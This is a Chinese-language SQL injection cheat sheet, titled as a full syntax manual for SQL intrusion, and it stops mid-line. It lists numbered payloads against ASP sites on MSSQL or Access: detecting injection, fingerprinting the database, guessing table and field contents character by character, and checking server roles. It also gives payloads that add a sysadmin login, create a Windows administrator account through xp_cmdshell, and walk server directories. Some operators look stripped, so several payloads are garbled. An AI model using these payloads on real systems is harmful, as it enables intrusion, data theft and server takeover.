SQL入侵全語法手册.doc

SQL手工注入大全------------------------------------------------------------------比方说在查询id是50的数据时，如果用户传近来的参数是50 and 1=1，如果没有设置过滤的话，可以直接查出来，SQL 注入一般在ASP程序中遇到最多，看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user03.判断数据库系统;and (select count(*) from sysobjects)0 mssql;and (select count(*) from msysobjects)0 access4.注入参数是字符and [查询条件] and =5.搜索时没过滤参数的and [查询条件] and %25=6.猜数据库;and (select Count(*) from [数据库名])07.猜字段;and (select Count(字段名) from 数据库名)08.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)09.(1)猜字段的ascii值（access）;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0(2)猜字段的ascii值（mssql）;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)010.测试权限结构（mssql）;and 1=(select IS_SRVROLEMEMBER(sysadmin));--;and 1=(select IS_SRVROLEMEMBER(serveradmin));--;and 1=(select IS_SRVROLEMEMBER(setupadmin));--;and 1=(select IS_SRVROLEMEMBER(securityadmin));--;and 1=(select IS_SRVROLEMEMBER(diskadmin));--;and 1=(select IS_SRVROLEMEMBER(bulkadmin));--;and 1=(select IS_MEMBER(db_owner));--11.添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--;exec master.dbo.xp_cmdshell net user username password /add;--;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--12.(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree c:\;and (select top 1 paths from dirs)0;and (select top 1 paths from dirs where paths not in(上步得到的paths)))(2)遍历目录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构;insert int